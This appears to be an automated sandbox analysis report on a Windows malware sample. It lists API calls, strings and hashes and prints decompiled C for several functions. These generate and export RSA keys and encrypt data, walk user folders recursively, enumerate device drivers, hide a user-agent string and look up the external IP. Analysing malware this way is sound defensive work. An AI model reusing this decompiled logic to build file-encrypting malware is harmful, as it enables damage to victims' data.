CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBC82C0
VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0FBC82E8
GetModuleHandleA.KERNEL32(?), ref: 0FBC833D
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBC834B
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBC835A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBC837E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC838C
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0FBC292B), ref: 0FBC83A0
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FBC292B), ref: 0FBC83AE

Strings

CryptGenRandomAdvapi32.dll, xrefs: 0FBC8355, 0FBC8358
Advapi32.dll, xrefs: 0FBC8347, 0FBC834A

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: fcbb9546fa32c8c8788770eaab8f22faa2e986f8f8368722582220fa52666550
Instruction ID: 9ecc86f1fb2f3d7779fe8c2a7e2082535a232fc082323f2197441f4e976bd5c8
Opcode Fuzzy Hash: fcbb9546fa32c8c8788770eaab8f22faa2e986f8f8368722582220fa52666550
Instruction Fuzzy Hash: C931A471A00209AFDB108FA6EC4ABDFBB7CEB48711F104099F601F6180D7789A118FA4

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 89
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0FBC6530(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0xfbd2a48);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E0FBC34F0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0xfbd2a48);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}

APIs

EnterCriticalSection.KERNEL32(0FBD2A48,?,0FBC3724,00000000,00000000,00000000,?,00000800), ref: 0FBC653B
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0FBC3724,00000000,00000000,00000000), ref: 0FBC655E
GetLastError.KERNEL32(?,0FBC3724,00000000,00000000,00000000), ref: 0FBC6568
CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FBC3724,00000000,00000000,00000000), ref: 0FBC6584
CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0FBC3724,00000000,00000000), ref: 0FBC65B9
CryptGetKeyParam.ADVAPI32(00000000,00000008,0FBC3724,0000000A,00000000,?,0FBC3724,00000000), ref: 0FBC65DA
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0FBC3724,?,0FBC3724,00000000), ref: 0FBC6602
GetLastError.KERNEL32(?,0FBC3724,00000000), ref: 0FBC660B
CryptReleaseContext.ADVAPI32(00000000,00000000,?,0FBC3724,00000000,00000000), ref: 0FBC6628
LeaveCriticalSection.KERNEL32(0FBD2A48,?,0FBC3724,00000000,00000000), ref: 0FBC6633

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0FBC6553, 0FBC6579

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 72144047-1948191093
Opcode ID: 602ec0748875f617b87ecc7c56b7c99716ab98dfa3cfc379b4b928e4066827d3
Instruction ID: 2aafeb1e6ce8fb784089d7ed513d123bba60de3bb34933a3ed54b84700e16ced
Opcode Fuzzy Hash: 602ec0748875f617b87ecc7c56b7c99716ab98dfa3cfc379b4b928e4066827d3
Instruction Fuzzy Hash: 6E313C75A40309BBDB10CFA1ED55FEF7BB9EB48702F104198F605AB180DB79A6118FA1

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC62B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0FBC62B0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12);
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16);
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10);
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}

APIs

CryptAcquireContextW.ADVAPI32(0FBC49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,0FBC49C6,?,0FBC49CE), ref: 0FBC62C5
GetLastError.KERNEL32(?,0FBC49CE), ref: 0FBC62CF
CryptAcquireContextW.ADVAPI32(0FBC49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FBC49CE), ref: 0FBC62EB
CryptGenKey.ADVAPI32(0FBC49CE,0000A400,08000001,?,?,0FBC49CE), ref: 0FBC6317
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0FBC633B
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0FBC6353
CryptDestroyKey.ADVAPI32(?), ref: 0FBC635D
CryptReleaseContext.ADVAPI32(0FBC49CE,00000000), ref: 0FBC6369
CryptAcquireContextW.ADVAPI32(0FBC49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0FBC637E

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0FBC62BA, 0FBC62E0, 0FBC6373

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 137402220-1948191093
Opcode ID: b5660e1199245f188857ee096c667a082e559eeb5a5fe8b046e96ae67be1a1ec
Instruction ID: a4a69ffa538a4a8b3d3a1e9b94985caec232893f851c77ba9451931d1ce687c4
Opcode Fuzzy Hash: b5660e1199245f188857ee096c667a082e559eeb5a5fe8b046e96ae67be1a1ec
Instruction Fuzzy Hash: ED216275780309BBDB20CAA4ED59FDB376DAB4CB52F004588F705EB1C0C6B595119FA1

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC2F50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0FBC2F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				WCHAR* _t23;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8);
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4);
					_t35 = _t18;
					if(_t35 != 0) {
						_push( &_v12);
						_push(_v8);
						_push(_t35);
						if( *_t39() == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000);
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 <= 0) {
								goto L10;
							} else {
								while(1) {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400);
									if(_t23 != 0 && lstrcmpiW( &_v2064, _v16) == 0) {
										break;
									}
									_t40 = _t40 + 1;
									if(_t40 < _t31) {
										continue;
									} else {
										goto L10;
									}
									goto L12;
								}
								VirtualFree(_t35, 0, 0x8000);
								return 1;
							}
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

APIs

EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 0FBC2F74
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0FBC2F8D

Strings

i)w, xrefs: 0FBC2FE3

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: AllocDeviceDriversEnumVirtual
String ID: i)w
API String ID: 4140748134-1280834553
Opcode ID: e0da9b153bde738fdf98963860af8f9bdea6655225e9dcc292d758d570307bbe
Instruction ID: fc511c342491ae8507da5eb3c24faf7987263ceb2d5de6f78a8aac082dc504b5
Opcode Fuzzy Hash: e0da9b153bde738fdf98963860af8f9bdea6655225e9dcc292d758d570307bbe
Instruction Fuzzy Hash: F9219B3260011DABEB109A99AC45FEB77ACEB45711F1041E6FA04E7140D775A5169FE0

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6E90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 0FBC7CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FBC7EC4
Part of subcall function 0FBC7CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FBC7EDD

VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,772966A0,?), ref: 0FBC6EAF
lstrlenW.KERNEL32(0FBCFF0C), ref: 0FBC6EBC

Part of subcall function 0FBC7EF0: InternetCloseHandle.WININET(?), ref: 0FBC7F03
Part of subcall function 0FBC7EF0: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0FBC7F22

lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0FBCFF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0FBC6EEB
wsprintfW.USER32 ref: 0FBC6F03
VirtualFree.KERNEL32(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0FBCFF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0FBC6F19
InternetCloseHandle.WININET(?), ref: 0FBC6F27

Strings

ipv4bot.whatismyipaddress.com, xrefs: 0FBC6EDC
GET, xrefs: 0FBC6EC4

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
String ID: GET$ipv4bot.whatismyipaddress.com
API String ID: 4289327240-2259699238
Opcode ID: bf35f0d85a801dc5f388a299f769713b5baa25d8452cd31ca7b0fd1e416b91d3
Instruction ID: 5b5a3f533e58bb0051f52808c7dc6a14e9b58df47b5e9d31ae28a1b034e295c7
Opcode Fuzzy Hash: bf35f0d85a801dc5f388a299f769713b5baa25d8452cd31ca7b0fd1e416b91d3
Instruction Fuzzy Hash: A801963164120877DB106A66BC4EF9B3B2EEB86F52F0000E8FA05E2081DE685516CEF5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6C90 Relevance: 13.6, APIs: 9, Instructions: 109
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FBC6C90(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E0FBC6A40(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E0FBC6BE0(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if(__eflags == 0) {
										_v16 =  *_t54;
										_t46 = E0FBC6950(_t63,  &_v616, __eflags, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E0FBC6C90(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}

APIs

Part of subcall function 0FBC6640: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6653
Part of subcall function 0FBC6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC66F2
Part of subcall function 0FBC6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC670C
Part of subcall function 0FBC6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6726
Part of subcall function 0FBC6640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6740
Part of subcall function 0FBC6640: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FBC6CA6,00000000,?,?), ref: 0FBC6760

Part of subcall function 0FBC6A40: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBC6A52
Part of subcall function 0FBC6A40: lstrcatW.KERNEL32(00000000,0FBCFEC4), ref: 0FBC6A64
Part of subcall function 0FBC6A40: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBC6A72
Part of subcall function 0FBC6A40: lstrcmpW.KERNEL32(?,0FBCFEC8,?,?), ref: 0FBC6A9C
Part of subcall function 0FBC6A40: lstrcmpW.KERNEL32(?,0FBCFECC,?,?), ref: 0FBC6AB2
Part of subcall function 0FBC6A40: lstrcatW.KERNEL32(00000000,?), ref: 0FBC6AC4
Part of subcall function 0FBC6A40: lstrlenW.KERNEL32(00000000,?,?), ref: 0FBC6ACB
Part of subcall function 0FBC6A40: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0FBC6AFA
Part of subcall function 0FBC6A40: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0FBC6B11
Part of subcall function 0FBC6A40: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0FBC6B1C
Part of subcall function 0FBC6A40: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0FBC6B3A
Part of subcall function 0FBC6A40: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0FBC6B4F

Part of subcall function 0FBC6BE0: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0FBC6CC2,00000000,?,?), ref: 0FBC6BF5
Part of subcall function 0FBC6BE0: wsprintfW.USER32 ref: 0FBC6C03
Part of subcall function 0FBC6BE0: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0FBC6C1F
Part of subcall function 0FBC6BE0: GetLastError.KERNEL32(?,?), ref: 0FBC6C2C
Part of subcall function 0FBC6BE0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FBC6C78

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FBC6CC3
lstrcatW.KERNEL32(00000000,0FBCFEC4), ref: 0FBC6CDB
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FBC6CE5
lstrcmpW.KERNEL32(?,0FBCFEC8,?,?), ref: 0FBC6D1C
lstrcmpW.KERNEL32(?,0FBCFECC,?,?), ref: 0FBC6D36
lstrcatW.KERNEL32(00000000,?), ref: 0FBC6D48
lstrcatW.KERNEL32(00000000,0FBCFEFC), ref: 0FBC6D59
FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0FBC6DBD
FindClose.KERNEL32(00003000,?,?), ref: 0FBC6DCE

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: File$Virtuallstrcatlstrcmp$FindFolderPathSpecial$Alloclstrlen$CreateFirstFree$CloseErrorLastNextReadSizewsprintf
String ID:
API String ID: 1112924665-0
Opcode ID: c7e00909be6b9a34ae591ee65c5ee088ff97ace0c4fe98a6df37e3b8f9749801
Instruction ID: c4dedb3cb0d3523380bca93040da68a3f436fdf22d864ca2cb763131f44bff6d
Opcode Fuzzy Hash: c7e00909be6b9a34ae591ee65c5ee088ff97ace0c4fe98a6df37e3b8f9749801
Instruction Fuzzy Hash: 5B319371A00219ABCF10AF65EC84DBF77BAEF48351B0441E9E909D7112DB35AA11DFE1

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC7CE0 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBC7CE0(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0);
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FBC7EC4
InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FBC7EDD

Strings

K, xrefs: 0FBC7E0E
5, xrefs: 0FBC7DF2
e, xrefs: 0FBC7DD7
3, xrefs: 0FBC7EBD
e, xrefs: 0FBC7DCD
h, xrefs: 0FBC7E54
M, xrefs: 0FBC7D04
i, xrefs: 0FBC7E2A
p, xrefs: 0FBC7DC3
T, xrefs: 0FBC7D73
., xrefs: 0FBC7E77
l, xrefs: 0FBC7D19
3, xrefs: 0FBC7E85
i, xrefs: 0FBC7D4B
, xrefs: 0FBC7E4D
z, xrefs: 0FBC7D0F
(, xrefs: 0FBC7D41
a, xrefs: 0FBC7D23
o, xrefs: 0FBC7E5B
G, xrefs: 0FBC7E38
5, xrefs: 0FBC7EAF
, xrefs: 0FBC7E23
7, xrefs: 0FBC7EB6
a, xrefs: 0FBC7E9A
T, xrefs: 0FBC7E15
d, xrefs: 0FBC7D55
w, xrefs: 0FBC7D5F
., xrefs: 0FBC7E70
A, xrefs: 0FBC7DB9
, xrefs: 0FBC7D91
8, xrefs: 0FBC7E8C
3, xrefs: 0FBC7E00
o, xrefs: 0FBC7E46
, xrefs: 0FBC7E07
8, xrefs: 0FBC7E7E
c, xrefs: 0FBC7E3F
, xrefs: 0FBC7E93
0, xrefs: 0FBC7D37
e, xrefs: 0FBC7E62
L, xrefs: 0FBC7E1C
i, xrefs: 0FBC7EA8
7, xrefs: 0FBC7DF9
t, xrefs: 0FBC7DEB
5, xrefs: 0FBC7D2D
K, xrefs: 0FBC7DE1
, xrefs: 0FBC7D69
1, xrefs: 0FBC7D87
O, xrefs: 0FBC7D9B
5, xrefs: 0FBC7E69
), xrefs: 0FBC7DAF
a, xrefs: 0FBC7EA1
6, xrefs: 0FBC7DA5
6, xrefs: 0FBC7D7D
e, xrefs: 0FBC7E31

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
API String ID: 2038078732-2805935662
Opcode ID: f2c82dd719d54498d6905cc5e8522a9bd6e643af8361d161577f5d147924823c
Instruction ID: 17398ceb8545a89f7969d9a3350730303f3d6214abe8620d1f13c6376ea35593
